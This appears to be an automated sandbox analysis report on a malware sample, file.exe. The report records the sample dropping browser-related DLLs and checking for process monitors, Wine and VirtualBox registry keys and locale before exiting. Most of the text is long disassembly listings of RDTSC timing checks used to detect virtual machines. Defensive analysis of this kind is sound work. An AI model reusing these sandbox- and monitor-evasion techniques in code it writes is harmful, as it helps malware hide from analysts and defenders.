Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00199270

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58346

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C3C95 second address: 3C3C9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545560 second address: 545574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FD000CC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FD000CC0C58h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544804 second address: 54480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544AB0 second address: 544AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547CFB second address: 547CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547CFF second address: 547D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547D03 second address: 547D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547D09 second address: 547D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547D0E second address: 547D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547DA4 second address: 547DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547DA9 second address: 547DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547DAF second address: 547E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 7BF1BC28h 0x0000000f stc 0x00000010 push 00000003h 0x00000012 mov ecx, dword ptr [ebp+122D2DD3h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FD000CC0C58h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov cx, 6D66h 0x00000038 push 00000003h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FD000CC0C58h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D3509h], edi 0x0000005a or esi, dword ptr [ebp+122D2D8Fh] 0x00000060 call 00007FD000CC0C59h 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FD000CC0C5Dh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547E3B second address: 547E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD001095A5Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD001095A5Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547E5A second address: 547E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547F8F second address: 547F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547F93 second address: 547F98 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56870E second address: 568727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FD001095A5Ah 0x0000000c jo 00007FD001095A62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568727 second address: 56872D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531F57 second address: 531F72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD001095A63h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531F72 second address: 531F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566636 second address: 566647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FD001095A5Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566647 second address: 566654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007FD000CC0C56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566919 second address: 566928 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566AA7 second address: 566AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566AAD second address: 566AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566EA6 second address: 566EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566EBC second address: 566ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566ED7 second address: 566EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566EDD second address: 566EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD001095A56h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 566EE9 second address: 566EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567038 second address: 567042 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567042 second address: 567065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FD000CC0C69h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5671F2 second address: 56722A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 pushad 0x00000008 jne 00007FD001095A56h 0x0000000e je 00007FD001095A56h 0x00000014 jp 00007FD001095A56h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56722A second address: 567230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567230 second address: 567234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567234 second address: 567242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567242 second address: 567246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567394 second address: 56739A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567610 second address: 567635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FD001095A63h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56778F second address: 567793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567793 second address: 5677AB instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FD001095A68h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FD001095A56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567906 second address: 56792C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnp 00007FD000CC0C56h 0x0000000e jmp 00007FD000CC0C61h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56824E second address: 568252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568252 second address: 568266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD000CC0C5Ch 0x0000000e jne 00007FD000CC0C56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 571C52 second address: 571C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 571C56 second address: 571C66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 571C66 second address: 571C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 571C6C second address: 571C76 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD000CC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 574C9A second address: 574C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 574C9E second address: 574CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57711D second address: 57714B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD001095A5Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5771EA second address: 577210 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD000CC0C58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 0E0EC7F1h 0x00000013 movsx edi, si 0x00000016 push 4F05B10Ch 0x0000001b pushad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5777F1 second address: 5777F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577D58 second address: 577D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577D5C second address: 577DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A61h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FD001095A58h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov esi, edi 0x00000029 xor dword ptr [ebp+122D1C28h], eax 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD001095A5Ah 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577DAF second address: 577DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD000CC0C5Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577FBB second address: 577FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577FBF second address: 577FF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD000CC0C63h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD000CC0C68h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5782A8 second address: 5782AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5783C6 second address: 5783F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD000CC0C68h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5783F0 second address: 578414 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A5Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578414 second address: 578428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578428 second address: 57842E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5789C0 second address: 578A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FD000CC0C62h 0x00000011 je 00007FD000CC0C5Ch 0x00000017 jng 00007FD000CC0C56h 0x0000001d nop 0x0000001e sub dword ptr [ebp+122D1C72h], ebx 0x00000024 push 00000000h 0x00000026 mov di, si 0x00000029 mov di, si 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FD000CC0C58h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 jng 00007FD000CC0C6Ah 0x0000004e call 00007FD000CC0C60h 0x00000053 mov di, cx 0x00000056 pop esi 0x00000057 mov dword ptr [ebp+122D1FFFh], ebx 0x0000005d xchg eax, ebx 0x0000005e jc 00007FD000CC0C62h 0x00000064 jc 00007FD000CC0C5Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578A3C second address: 578A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 jg 00007FD001095A56h 0x0000000d jp 00007FD001095A56h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5792A2 second address: 5792BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD000CC0C66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A316 second address: 57A38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD001095A56h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FD001095A58h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, 7C6353F3h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FD001095A58h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push 00000000h 0x00000050 jnc 00007FD001095A5Ah 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 pushad 0x00000059 push esi 0x0000005a pop esi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57ADE2 second address: 57AE05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FD000CC0C60h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57AABD second address: 57AAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57AAC1 second address: 57AAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57AAC5 second address: 57AACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57AACB second address: 57AAE1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD000CC0C5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57B5C5 second address: 57B5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57AAE1 second address: 57AAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57B80C second address: 57B87C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD001095A62h 0x00000010 jmp 00007FD001095A5Ch 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FD001095A58h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 js 00007FD001095A58h 0x00000039 mov esi, ecx 0x0000003b push 00000000h 0x0000003d mov di, FFFCh 0x00000041 push 00000000h 0x00000043 jmp 00007FD001095A61h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c jns 00007FD001095A56h 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57B5CB second address: 57B5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FD000CC0C64h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57AAE6 second address: 57AB04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD001095A69h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57B5E7 second address: 57B5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57D9E3 second address: 57D9E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57D9E7 second address: 57D9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
